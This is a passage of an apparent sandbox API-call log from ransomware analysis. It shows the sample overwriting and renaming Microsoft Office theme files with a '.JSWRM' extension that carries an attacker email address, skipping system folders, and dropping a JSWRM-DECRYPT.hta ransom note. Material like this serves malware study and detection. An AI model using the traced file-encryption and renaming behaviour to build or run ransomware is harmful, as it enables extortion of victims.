Flags=0x0, Size=0x20) returned 0x241010 [0101.205] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Wisp.thmx", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0101.205] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Wisp.thmx", cchWideChar=9, lpMultiByteStr=0x345ef40, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Wisp.thmx", lpUsedDefaultChar=0x0) returned 9 [0101.205] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0101.205] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0101.205] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Wisp.thmx", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0101.205] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Wisp.thmx", cchWideChar=9, lpMultiByteStr=0x345ef10, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Wisp.thmx", lpUsedDefaultChar=0x0) returned 9 [0101.205] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0101.205] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0101.205] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0101.205] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0101.205] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0101.206] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0101.206] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Wisp.thmx" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\wisp.thmx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0101.206] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=772033) returned 1 [0101.206] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0101.206] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24d210 [0101.206] ReadFile (in: hFile=0x45c, lpBuffer=0x24d210, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345ec04*=0x27100, lpOverlapped=0x0) returned 1 [0101.220] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0101.220] WriteFile (in: hFile=0x45c, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345ec00*=0x27100, lpOverlapped=0x0) returned 1 [0101.220] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0101.220] CloseHandle (hObject=0x45c) returned 1 [0101.221] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0101.221] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0101.221] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0101.221] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0101.221] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0101.221] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0101.221] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0101.221] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a4b0 [0101.221] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a4b0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0101.221] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a4b0 | out: hHeap=0x1e0000) returned 1 [0101.221] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0101.221] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2476a8 [0101.221] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0101.221] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0101.221] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Wisp.thmx" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\wisp.thmx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Wisp.thmx.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\wisp.thmx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0101.222] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2476a8 | out: hHeap=0x1e0000) returned 1 [0101.222] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0101.222] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0101.222] FindNextFileW (in: hFindFile=0x231d00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x114a91d5, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x114a91d5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x11567da2, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xbc7c1, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="Wisp.thmx", cAlternateFileName="WISP~1.THM")) returned 0 [0101.222] FindClose (in: hFindFile=0x231d00 | out: hFindFile=0x231d00) returned 1 [0101.222] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0101.222] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224e60 | out: hHeap=0x1e0000) returned 1 [0101.222] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224bb8 | out: hHeap=0x1e0000) returned 1 [0101.222] FindNextFileW (in: hFindFile=0x232200, lpFindFileData=0x345eff8 | out: lpFindFileData=0x345eff8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee45f66d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x114f5747, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x114f5747, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Flattener", cAlternateFileName="FLATTE~1")) returned 1 [0101.222] lstrcmpiW (lpString1="Flattener", lpString2=".") returned 1 [0101.222] lstrcmpiW (lpString1="Flattener", lpString2="..") returned 1 [0101.222] lstrcmpiW (lpString1="Flattener", lpString2="...") returned 1 [0101.222] lstrcmpiW (lpString1="Flattener", lpString2="windows") returned -1 [0101.222] lstrcmpiW (lpString1="Flattener", lpString2="recovery") returned -1 [0101.223] lstrcmpiW (lpString1="Flattener", lpString2="perflogs") returned -1 [0101.223] lstrcmpiW (lpString1="Flattener", lpString2="documents and settings") returned 1 [0101.223] lstrcmpiW (lpString1="Flattener", lpString2="$RECYCLE.BIN") returned 1 [0101.223] lstrcmpiW (lpString1="Flattener", lpString2="system volume information") returned -1 [0101.223] lstrcmpiW (lpString1="Flattener", lpString2="msocache") returned -1 [0101.223] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2092d8 [0101.223] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224d50 | out: hHeap=0x1e0000) returned 1 [0101.223] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209800 [0101.223] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209170 [0101.223] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa6) returned 0x2173b0 [0101.223] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209170 | out: hHeap=0x1e0000) returned 1 [0101.223] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Flattener\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\flattener\\jswrm-decrypt.hta")) returned 0xffffffff [0101.223] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2173b0 | out: hHeap=0x1e0000) returned 1 [0101.223] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0101.223] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345be5c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0101.223] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0101.223] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x205850 [0101.223] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0101.223] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x24d210 [0101.223] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0101.223] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209698 [0101.223] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa6) returned 0x216d80 [0101.223] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209698 | out: hHeap=0x1e0000) returned 1 [0101.223] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Flattener\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\flattener\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x458 [0101.224] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0101.224] WriteFile (in: hFile=0x458, lpBuffer=0x345bf70*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345bf3c, lpOverlapped=0x0 | out: lpBuffer=0x345bf70*, lpNumberOfBytesWritten=0x345bf3c*=0x230c, lpOverlapped=0x0) returned 1 [0101.225] CloseHandle (hObject=0x458) returned 1 [0101.225] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x216d80 | out: hHeap=0x1e0000) returned 1 [0101.225] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0101.225] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209800 | out: hHeap=0x1e0000) returned 1 [0101.225] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2091e8 [0101.225] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209350 [0101.225] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2093c8 [0101.225] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209440 [0101.225] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa6) returned 0x2179e0 [0101.225] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209440 | out: hHeap=0x1e0000) returned 1 [0101.225] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Flattener\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\flattener\\jswrm-decrypt.hta")) returned 0x20 [0101.225] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2179e0 | out: hHeap=0x1e0000) returned 1 [0101.225] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2093c8 | out: hHeap=0x1e0000) returned 1 [0101.225] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2095a8 [0101.225] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Flattener\\*.*", lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee45f66d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x114f5747, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x32ff86b0, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName=".", cAlternateFileName="")) returned 0x231d00 [0101.225] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0101.225] FindNextFileW (in: hFindFile=0x231d00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee45f66d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x114f5747, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x32ff86b0, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="..", cAlternateFileName="")) returned 1 [0101.225] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0101.225] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0101.226] FindNextFileW (in: hFindFile=0x231d00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfa937f07, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfa937f07, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfae22cc9, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x48c0, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="api-ms-win-core-file-l1-2-0.dll", cAlternateFileName="APDEA0~1.DLL")) returned 1 [0101.226] lstrcmpiW (lpString1="api-ms-win-core-file-l1-2-0.dll", lpString2=".") returned 1 [0101.226] lstrcmpiW (lpString1="api-ms-win-core-file-l1-2-0.dll", lpString2="..") returned 1 [0101.226] lstrcmpiW (lpString1="api-ms-win-core-file-l1-2-0.dll", lpString2="...") returned 1 [0101.226] lstrcmpiW (lpString1="api-ms-win-core-file-l1-2-0.dll", lpString2="windows") returned -1 [0101.226] lstrcmpiW (lpString1="api-ms-win-core-file-l1-2-0.dll", lpString2="recovery") returned -1 [0101.226] lstrcmpiW (lpString1="api-ms-win-core-file-l1-2-0.dll", lpString2="perflogs") returned -1 [0101.226] lstrcmpiW (lpString1="api-ms-win-core-file-l1-2-0.dll", lpString2="documents and settings") returned -1 [0101.226] lstrcmpiW (lpString1="api-ms-win-core-file-l1-2-0.dll", lpString2="$RECYCLE.BIN") returned 1 [0101.226] lstrcmpiW (lpString1="api-ms-win-core-file-l1-2-0.dll", lpString2="system volume information") returned -1 [0101.226] lstrcmpiW (lpString1="api-ms-win-core-file-l1-2-0.dll", lpString2="msocache") returned -1 [0101.226] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0101.226] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-core-file-l1-2-0.dll", cchWideChar=31, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0101.226] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0101.226] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-core-file-l1-2-0.dll", cchWideChar=31, lpMultiByteStr=0x241358, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="api-ms-win-core-file-l1-2-0.dll", lpUsedDefaultChar=0x0) returned 31 [0101.226] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0101.226] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0101.226] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-core-file-l1-2-0.dll", cchWideChar=31, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0101.226] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0101.226] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-core-file-l1-2-0.dll", cchWideChar=31, lpMultiByteStr=0x240f70, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="api-ms-win-core-file-l1-2-0.dll", lpUsedDefaultChar=0x0) returned 31 [0101.226] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0101.226] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2362f8 [0101.226] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2095a8 | out: hHeap=0x1e0000) returned 1 [0101.226] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0101.226] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0101.226] FindNextFileW (in: hFindFile=0x231d00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf035e09d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf035e09d, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf035e09d, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x48c0, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="api-ms-win-core-file-l2-1-0.dll", cAlternateFileName="API-MS~2.DLL")) returned 1 [0101.226] lstrcmpiW (lpString1="api-ms-win-core-file-l2-1-0.dll", lpString2=".") returned 1 [0101.226] lstrcmpiW (lpString1="api-ms-win-core-file-l2-1-0.dll", lpString2="..") returned 1 [0101.226] lstrcmpiW (lpString1="api-ms-win-core-file-l2-1-0.dll", lpString2="...") returned 1 [0101.226] lstrcmpiW (lpString1="api-ms-win-core-file-l2-1-0.dll", lpString2="windows") returned -1 [0101.226] lstrcmpiW (lpString1="api-ms-win-core-file-l2-1-0.dll", lpString2="recovery") returned -1 [0101.226] lstrcmpiW (lpString1="api-ms-win-core-file-l2-1-0.dll", lpString2="perflogs") returned -1 [0101.226] lstrcmpiW (lpString1="api-ms-win-core-file-l2-1-0.dll", lpString2="documents and settings") returned -1 [0101.227] lstrcmpiW (lpString1="api-ms-win-core-file-l2-1-0.dll", lpString2="$RECYCLE.BIN") returned 1 [0101.227] lstrcmpiW (lpString1="api-ms-win-core-file-l2-1-0.dll", lpString2="system volume information") returned -1 [0101.227] lstrcmpiW (lpString1="api-ms-win-core-file-l2-1-0.dll", lpString2="msocache") returned -1 [0101.227] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0101.227] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-core-file-l2-1-0.dll", cchWideChar=31, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0101.227] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0101.227] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-core-file-l2-1-0.dll", cchWideChar=31, lpMultiByteStr=0x241178, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="api-ms-win-core-file-l2-1-0.dll", lpUsedDefaultChar=0x0) returned 31 [0101.227] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0101.227] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0101.227] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-core-file-l2-1-0.dll", cchWideChar=31, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0101.227] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241218 [0101.227] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-core-file-l2-1-0.dll", cchWideChar=31, lpMultiByteStr=0x241218, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="api-ms-win-core-file-l2-1-0.dll", lpUsedDefaultChar=0x0) returned 31 [0101.227] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0101.227] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2368b8 [0101.227] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2362f8 | out: hHeap=0x1e0000) returned 1 [0101.227] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241218 | out: hHeap=0x1e0000) returned 1 [0101.227] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0101.227] FindNextFileW (in: hFindFile=0x231d00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x5c164a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x5c164a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x5c164a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x52c0, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="api-ms-win-core-localization-l1-2-0.dll", cAlternateFileName="AP6221~1.DLL")) returned 1 [0101.227] lstrcmpiW (lpString1="api-ms-win-core-localization-l1-2-0.dll", lpString2=".") returned 1 [0101.227] lstrcmpiW (lpString1="api-ms-win-core-localization-l1-2-0.dll", lpString2="..") returned 1 [0101.227] lstrcmpiW (lpString1="api-ms-win-core-localization-l1-2-0.dll", lpString2="...") returned 1 [0101.227] lstrcmpiW (lpString1="api-ms-win-core-localization-l1-2-0.dll", lpString2="windows") returned -1 [0101.227] lstrcmpiW (lpString1="api-ms-win-core-localization-l1-2-0.dll", lpString2="recovery") returned -1 [0101.227] lstrcmpiW (lpString1="api-ms-win-core-localization-l1-2-0.dll", lpString2="perflogs") returned -1 [0101.227] lstrcmpiW (lpString1="api-ms-win-core-localization-l1-2-0.dll", lpString2="documents and settings") returned -1 [0101.227] lstrcmpiW (lpString1="api-ms-win-core-localization-l1-2-0.dll", lpString2="$RECYCLE.BIN") returned 1 [0101.227] lstrcmpiW (lpString1="api-ms-win-core-localization-l1-2-0.dll", lpString2="system volume information") returned -1 [0101.227] lstrcmpiW (lpString1="api-ms-win-core-localization-l1-2-0.dll", lpString2="msocache") returned -1 [0101.227] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c2d0 [0101.227] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-core-localization-l1-2-0.dll", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0101.227] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0101.227] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-core-localization-l1-2-0.dll", cchWideChar=39, lpMultiByteStr=0x22cdc8, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="api-ms-win-core-localization-l1-2-0.dll", lpUsedDefaultChar=0x0) returned 39 [0101.227] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c2d0 | out: hHeap=0x1e0000) returned 1 [0101.227] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c118 [0101.227] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-core-localization-l1-2-0.dll", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0101.228] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0101.228] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-core-localization-l1-2-0.dll", cchWideChar=39, lpMultiByteStr=0x22d0a0, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="api-ms-win-core-localization-l1-2-0.dll", lpUsedDefaultChar=0x0) returned 39 [0101.228] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c118 | out: hHeap=0x1e0000) returned 1 [0101.228] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bce0 [0101.228] HeapFree (in: 